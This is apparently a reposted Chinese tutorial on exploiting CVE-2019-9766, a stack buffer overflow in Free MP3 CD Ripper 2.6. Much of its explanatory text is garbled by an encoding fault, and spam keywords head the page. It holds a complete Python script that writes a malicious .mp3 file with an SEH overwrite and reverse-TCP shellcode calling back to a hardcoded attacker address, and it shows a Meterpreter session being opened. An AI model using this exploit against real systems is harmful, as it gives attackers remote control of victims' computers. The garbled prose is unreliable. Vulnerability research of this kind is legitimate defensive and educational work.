自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

<sup id="y7r8h"><rt id="y7r8h"></rt></sup>

<ruby id="y7r8h"><cite id="y7r8h"><menu id="y7r8h"></menu></cite></ruby>

51CTO首頁(yè)

AI.x社區(qū)

軟考社區(qū)

免費(fèi)課

企業(yè)培訓(xùn)

鴻蒙開(kāi)發(fā)者社區(qū)

WOT技術(shù)大會(huì)

公眾號(hào)矩陣

移動(dòng)端

視頻課免費(fèi)課排行榜短視頻直播課軟考學(xué)堂

全部課程軟考華為認(rèn)證廠商認(rèn)證 IT技術(shù)PMP項(xiàng)目管理免費(fèi)題庫(kù)

在線(xiàn)學(xué)習(xí)

文章資源問(wèn)答課堂專(zhuān)欄直播

51CTO

鴻蒙開(kāi)發(fā)者社區(qū)

51CTO技術(shù)棧

51CTO官微

51CTO學(xué)堂

51CTO博客

CTO訓(xùn)練營(yíng)

鴻蒙開(kāi)發(fā)者社區(qū)訂閱號(hào)

51CTO軟考

51CTO學(xué)堂APP

51CTO學(xué)堂企業(yè)版APP

鴻蒙開(kāi)發(fā)者社區(qū)視頻號(hào)

51CTO軟考題庫(kù)

賬號(hào)設(shè)置退出

關(guān)于CVE-2019-9766緩沖區(qū)溢出漏洞的滲透模塊編寫(xiě)與測(cè)試

作者：Neroqi 2019-04-02 09:09:14

CVE-2019-9766曝出了關(guān)于Free MP3 CD Ripper的緩沖區(qū)溢出漏洞，在轉(zhuǎn)換文件時(shí)，F(xiàn)ree MP3 CD Ripper 2.6中基于堆棧的緩沖區(qū)溢出漏洞允許用戶(hù)輔助的遠(yuǎn)程攻擊者通過(guò)特制的.mp3文件執(zhí)行任意代碼。本文詳細(xì)描述了該漏洞的驗(yàn)證方法，滲透模塊的編寫(xiě)及測(cè)試過(guò)程。

?°??

CVE-2019-9766??3?á?1?óúFree MP3 CD Ripperμ??o3???ò?3????′￡??ú×a?????tê±￡?Free MP3 CD Ripper 2.6?D?ùóú????μ??o3???ò?3????′?êDíó??§?¨?úμ???3ì1￥?÷??í¨1yì???μ?.mp3???t?′DDè?òa′ú???￡±????ê???èê?á??????′μ??é?¤·?·¨￡?é?í??￡?éμ?±àD′?°2aê?1y3ì?￡

è?Dèá??a???′?ê?é￡???2???è???URL￡ohttps://nvd.nist.gov/vuln/detail/CVE-2019-9766

êμ?é?·?3

é?í??÷?ú￡oKali-Linux-2019.1-vm-amd64
??±ê?÷?ú￡oCN_Windows7_x86_sp1
èí?t°?±?￡oFree MP3 CD Ripper 2.6

é??°1¤??

WinDbgx86-v6.12.2.633
python-2.7.15
ImmunityDebugger1.85

êμ?é2??è

1. ?é?¤???o3???ò?3????′

(1) í¨1ypythonéú3é×??¨ò?μ?.mp3???t￡??aà???10000??×?·?A×a??3é.mp3???t￡?′ú??è???￡o

(2) ?úKali?D?′DDFmcrExploit.py￡?éú3éTestFMCR.mp3???t￡?è???í??ùê?￡o

(3) ??TestFMCR.mp3?′??μ???±ê?÷?ú￡?′ò?aFree MP3 CD Ripper￡??ù′ò?aWinDbg￡?2￠??WinDbg???óμ???3ìfcrip.exe(Free MP3 CD Ripperμ???3ì)é?￡?è???í??ùê?￡o

(4) ?úFree MP3 CD Ripper?Dμ??÷“Convert”￡????DTestFMCR.mp3??DD×a??￡?è???í??ùê?￡o

(5) ?úWinDbg?D?′DD?üá?g￡??éò??′μ?3ìDò·￠éúá?òì3￡￡?è???í??ùê?￡o

(6) ?ù′??′DD?üá?!exchain￡?2é?′SEHá′D??￠￡?è???í??ùê?￡o

?-1yé?ê?áù??2??è￡??ò??è·?¨á??o3???ò?3????′μ?′??ú￡?2￠?òó?10000??×?·?A3é1|?2??á?SEH?￡

2. ±àD′???′à?ó?3ìDò

(1) ?¨??3ìDòμ?ò?3?μ?￡??′Dèòa?àéù??×?·?A2??ü1??2??μ?SEH￡?ê×?èéú3éò???3¤?è10000?ò??óD???′×?·?μ???±?￡??üá?è???￡o

root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 10000

?úèYì??à￡??aà?????í?ò?2?·?￡o

(2) ó?????±?ì???FmcrExploit.py?Dμ?”A”*10000￡????′2??è1.2￡?éú3éTestFMCR.mp3???t;

(3) ???′2??è1.3?￠1.4?￠1.5oí1.6￡?·￠??Pointer to next SEH record±?0×46326846?2??￡?è???í??ùê?￡o

(4) í¨1y0×46326846?¨??3ìDòμ?ò?3?μ?￡??éò??aμà??òaì?3?4116??×?·??í?éò??2??μ? Pointer to next SEH record￡???ì?è???￡o

(5) ?é?¤2.4?Dμ?μ?μ?ò?3?μ?ê?·??yè·￡???FmcrExploit.py?Dμ?buffer?3?μ?a”A”*4116￡????′2??è1.2￡?éú3éTestFMCR.mp3???t￡??????t?′??μ???±ê?÷?ú;

(6) ?ú??±ê?÷?ú?D′ò?aImmunityDebugger1.85￡???DDFree MP3 CD Ripper￡?convert2??è2.5?Déú3éμ?mp3???t￡?μ?μ?è????á1?￡o

?éò??′μ?4116??×?·?A?yo??2??μ?á?Pointer to next SEH record￡??¨??3é1|?￡

(7) Pointer to next SEH record(?ò3?nseh)￡???ê???ò???seh?á11μ?????￡??aà?ê1ó?”\xeb\x06\x90\x90″ì?3?￡??a??×??ú·′??±àμ??á1?ê?jmp 6?￠nop?￠nopèyì???á?￡?jmp 6±íê?ì?1y6??×??ú￡???o?ì?1yá???nop??á?oíò???4×??úμ?seh′|àí3ìDòμ??·￡?è?oó??è?nop??á???￡???DD??è?shellcode?￡

(8) ±?ày?D?ò??òa?áo?ê1ó?sehó?nseh￡?2??ü1?íê3éò?3?1￥?÷μ?è?2?1y3ì￡?á÷3ìè???￡o

(9) ?°?òpop pop retèyì?á?D???á?ê?ò?????μ??￡?úxp?D?a??1y3ì?á?òμ￥oü?à￡?μ?ê?win7?°?ü??°?±?μ??μí3?D?óè?á?safeseh?￠ASLRμè°2è?±￡?¤′?ê??￡°ì·¨×ü±èà§???à￡??a??°ì·¨ò2ê?óDμ??￡?úImmunityDebugger1.85?′DD?üá?!mona seh￡??á1?è???￡o

(10) ?üá?!mona sehμ?ê?3??á1??úseh.txt(?????t?úImmunityDebugger1.85μ?°2×°??????)?D￡??ú???D?òμ?è???ò?ì?D??￠￡o

?éò??′μ??a??pop pop ret??á?DòáD￡???ó|μ?ê?èí?t×?′?μ?dll???t(C:\Program Files\Free MP3 CD Ripper\ogg.dll)￡?×￠òa2?òaê1ó??μí3×?′?μ?dll???t￡??é?ü?áóDASLR?￠SafeSEH±￡?¤?￡è?oó?ò???í?éò??úFmcrExploit.py?D??SEH?3?μ “\x84\x20\xe4\x66″?￡

213?￡ocpu?Dμ??·êy?Yμ??3Dòoíí?????′??íμ?μ??·?3Dò?à·′￡?′?ê±CPU?Dμ?μ??·êy?Y?a“0x66e42084”￡????′í??????íDèòa°′“0x8420e466”à′′??íμ??·êy?Y?￡

(11) ?¨??ò???shellcode￡??aà??ò????×÷ò???·′?òTCPá??óμ?shellcode￡?2ù×÷è???￡o

(12) ′ó2.11?D?éò??′3?￡?éú3éμ?shellcode?a341×??ú￡?Dèòa????ò????o3???μ?′óD?ê?·??ü1?·?è???shellcode?￡?ù?YImmunityDebugger1.85μ?μ÷ê??á1?￡??ò??à′????ò????o3???μ?′óD?￡?μ÷ê??á1?è???(?úèY???à￡??ú??ò?2?·?)￡o

040AFEBC   040AFEE8  èt.   Pointer to next SEH record  
040AFEC0   004955CB  ?UI.   SE handler  
040AFEC4   040AFED4  ?t.  
......  
040AFEE4  |00492C1A  ,I.  RETURN to fcrip.00492C1A  
040AFEE8  |040AFF24  $?.  Pointer to next SEH record  
040AFEEC  |00492C24  $,I.  SE handler  
......  
040AFFC4  |FFFFFFFF  ????  End of SEH chain  
040AFFC8  |7769E0ED  íàiw   SE handler  
......  
040AFFF4   004047F4  ?G@.   fcrip.004047F4  
040AFFF8   01483044  D0H  
040AFFFC   00000000  ....

0x 040AFFFC -0x 040AFEC4 =0×138￡?????3éê?????ê?312￡????′?o3???μ?′óD??íê?312+4=316×??ú￡???è?316×??ú???′??·?2???341×??úμ?shellcode?￡

(13) μ?′??í?T·¨?ìD???è￥á??e?°ì·¨×ü±èà§???à°?￡??ò???éò?3￠ê?°?shellcode??DD?1??￡?2ù×÷è???￡o

?éò??′μ?￡??-1y?1????oó￡?shellcode±??a283×??ú￡??ü1?íêè?·?è??o3???á??￡

(14) ??×üò?é?2ù×÷￡?±à?-FmcrExploit.py￡?′ú??è???￡o

# Stack-based buffer overflow in Free MP3 CD Ripper 2.6     
buffer = "A" * 4116  
NSEH = "\xeb\x06\x90\x90"  
SEH = "\x84\x20\xe4\x66"  
nops = "\x90" * 5     
buf = ""  
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"  
buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"  
buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"  
buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"  
buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"  
buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"  
buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"  
buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"  
buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"  
buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"  
buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"  
buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"  
buf += "\x68\x02\x00\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"  
buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"  
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"  
buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"  
buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"  
buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"  
buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"  
pad = "B" * (316 - len(nops) - len(buf) )  
payload = buffer + NSEH + SEH + nops + buf +pad     
try:  
    f=open("TestFMCR.mp3","w")  
    print "[+] Creating %s bytes mp3 File..." %len(payload)  
    f.write(payload)  
    f.close()  
    print "[+] mp3 File created successfully!"  
except:  
print "File cannot be created!"

3. é?í??￡?é2aê?

(1) ?úKaliμ?msfconsole?D???ˉ?ììy??￡?μè′y??±ê?÷?úé???￡?2ù×÷è???í??ùê?￡o

(2) ??×???°?FmcrExploit.pyéú3éμ?TestFMCR.mp3???t??±′μ???±ê?÷?ú￡?′ò?aFree MP3 CD Ripper￡?Convert??mp3???t￡?è?oómeterpreter session3é1|?¨á￠￡?è???í??ùê?￡o

?á′?￡?????Free MP3 CD Ripper 2.6?o3???ò?3????′μ?é?í??￡?éμ?±àD′oí2aê??3à?íê3é!?úêμ???D￡??é?ü?1Dèòa?áo?é?1¤μ?·?·¨￡?ê1mp3???tμ?′???±ê?÷?ú?￡

??±à?-í?????

NSA μ?èí?t???ò1¤3ì?ò?ü Ghidra ??3????′
ECShop 4.0·′é?DíXSS???′·???
óòé?í?——DNS????μ???è?
HTTPS ò22?°2è?￡?±?·￠??D????′?á±?????μ?êy?Y
TP-Link 2???ó|￡?°2è?1¤3ìê|1??aá????·óé?÷???′

責(zé)任編輯：趙寧寧來(lái)源： Freebuf

漏洞滲透溢出攻擊

點(diǎn)贊

51CTO技術(shù)棧公眾號(hào)

業(yè)務(wù)
速覽

媒體

51CTO CIOAge HC3i

社區(qū)

51CTO博客鴻蒙開(kāi)發(fā)者社區(qū) AI.x社區(qū)

教育

51CTO學(xué)堂精培企業(yè)培訓(xùn) CTO訓(xùn)練營(yíng)

<legend id="8uikd"><track id="8uikd"><dfn id="8uikd"></dfn></track></legend>